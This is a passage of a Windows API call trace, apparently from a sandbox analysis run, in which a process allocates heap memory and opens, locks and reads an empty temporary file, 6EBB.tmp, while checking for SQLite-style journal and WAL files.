CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x392a350, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp") returned 46 [0162.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0162.844] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x395b8c8 [0162.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", nBufferLength=0x31, lpBuffer=0x395b8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", lpFilePart=0x0) returned 0x2d [0162.844] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0162.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0162.845] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a350 [0162.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", cchWideChar=-1, lpMultiByteStr=0x392a350, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp", lpUsedDefaultChar=0x0) returned 46 [0162.845] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.845] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0162.845] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a350 [0162.845] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0162.845] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0162.845] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a5e0 [0162.845] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x392a5e0, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp") returned 46 [0162.845] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df10c | out: lpFileInformation=0x2df10c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe457af70, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe457af70, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0162.845] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0162.845] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0162.845] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x394c1b8 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a5e0 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929b20 [0162.846] ReadFile (in: hFile=0x15c, lpBuffer=0x2df22c, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2df1d4, lpOverlapped=0x2df1b4 | out: lpBuffer=0x2df22c, lpNumberOfBytesRead=0x2df1d4*=0x0, lpOverlapped=0x2df1b4) returned 0 [0162.846] GetLastError () returned 0x26 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a660 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a6c0 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x394b988 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a840 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x392bf70 [0162.846] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0162.846] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b878 | out: hHeap=0x2dc0000) returned 1 [0162.846] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392aa08 [0162.846] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x394b848 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9f0 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394b8a0 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9d8 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a9c0 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a9a8 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a978 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929f28 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0162.847] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0162.847] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0162.847] LockFileEx (in: hFile=0x15c, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7c0 | out: lpOverlapped=0x2de7c0) returned 1 [0162.847] LockFileEx (in: hFile=0x15c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7b4 | out: lpOverlapped=0x2de7b4) returned 1 [0162.847] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de7c4 | out: lpOverlapped=0x2de7c4) returned 1 [0162.847] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0162.847] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929f28 [0162.847] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0162.847] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x3929f28, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-journal") returned 54 [0162.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2de7c4 | out: lpFileInformation=0x2de7c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.847] GetLastError () returned 0x2 [0162.847] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0162.847] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0162.847] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0162.848] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0162.848] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.848] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-wal") returned 50 [0162.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2de7d4 | out: lpFileInformation=0x2de7d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.848] GetLastError () returned 0x2 [0162.848] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.848] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.848] GetFileSize (in: hFile=0x15c, lpFileSizeHigh=0x2de800 | out: lpFileSizeHigh=0x2de800*=0x0) returned 0x0 [0162.848] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14c80) returned 0x395c8b0 [0162.848] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0162.849] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0162.850] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de498 | out: lpOverlapped=0x2de498) returned 1 [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394ba50 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x13 [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929f28 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a8b8 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0xa [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929f80 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x80 [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a918 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0xa [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a960 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0xe [0162.850] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a7f8 [0162.850] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xd [0162.851] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a780 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0x9 [0162.851] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a798 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0x10 [0162.851] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392a008 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0xe0 [0162.851] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0162.851] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0xe0 [0162.851] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a008 | out: hHeap=0x2dc0000) returned 1 [0162.851] LockFileEx (in: hFile=0x15c, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2defa0 | out: lpOverlapped=0x2defa0) returned 1 [0162.851] LockFileEx (in: hFile=0x15c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def94 | out: lpOverlapped=0x2def94) returned 1 [0162.851] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2defa4 | out: lpOverlapped=0x2defa4) returned 1 [0162.851] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0162.851] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x392a008 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0x6c [0162.851] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x392a008, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-journal") returned 54 [0162.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2defa4 | out: lpFileInformation=0x2defa4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.851] GetLastError () returned 0x2 [0162.851] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a008) returned 0x6c [0162.851] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a008 | out: hHeap=0x2dc0000) returned 1 [0162.851] ReadFile (in: hFile=0x15c, lpBuffer=0x2df020, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2deff4, lpOverlapped=0x2defd4 | out: lpBuffer=0x2df020, lpNumberOfBytesRead=0x2deff4*=0x0, lpOverlapped=0x2defd4) returned 0 [0162.851] GetLastError () returned 0x26 [0162.851] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0162.852] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.852] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-wal") returned 50 [0162.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6EBB.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6ebb.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2defb4 | out: lpFileInformation=0x2defb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.852] GetLastError () returned 0x2 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.852] GetFileSize (in: hFile=0x15c, lpFileSizeHigh=0x2defe0 | out: lpFileSizeHigh=0x2defe0*=0x0) returned 0x0 [0162.852] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2defd0 | out: lpOverlapped=0x2defd0) returned 1 [0162.852] CloseHandle (hObject=0x15c) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395c8b0 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9f0) returned 0xa [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9f0 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9d8) returned 0xa [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9d8 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9c0) returned 0xe [0162.852] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9c0 | out: hHeap=0x2dc0000) returned 1 [0162.852] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xd [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9a8 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0x9 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a978 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b8a0 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aa08) returned 0xe [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392aa08 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x54 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a660 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ac0) returned 0x54 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ac0 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a88) returned 0x30 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a88 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0xa [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8b8 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0xa [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a918 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0xe [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a960 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xd [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7f8 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0x9 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a780 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x80 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f80 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x13 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba50 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0162.853] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0x10 [0162.853] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b988 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a00) returned 0x42 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a00 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39299b0) returned 0x43 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39299b0 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b938) returned 0x43 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b938 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0162.854] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0162.854] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0162.854] 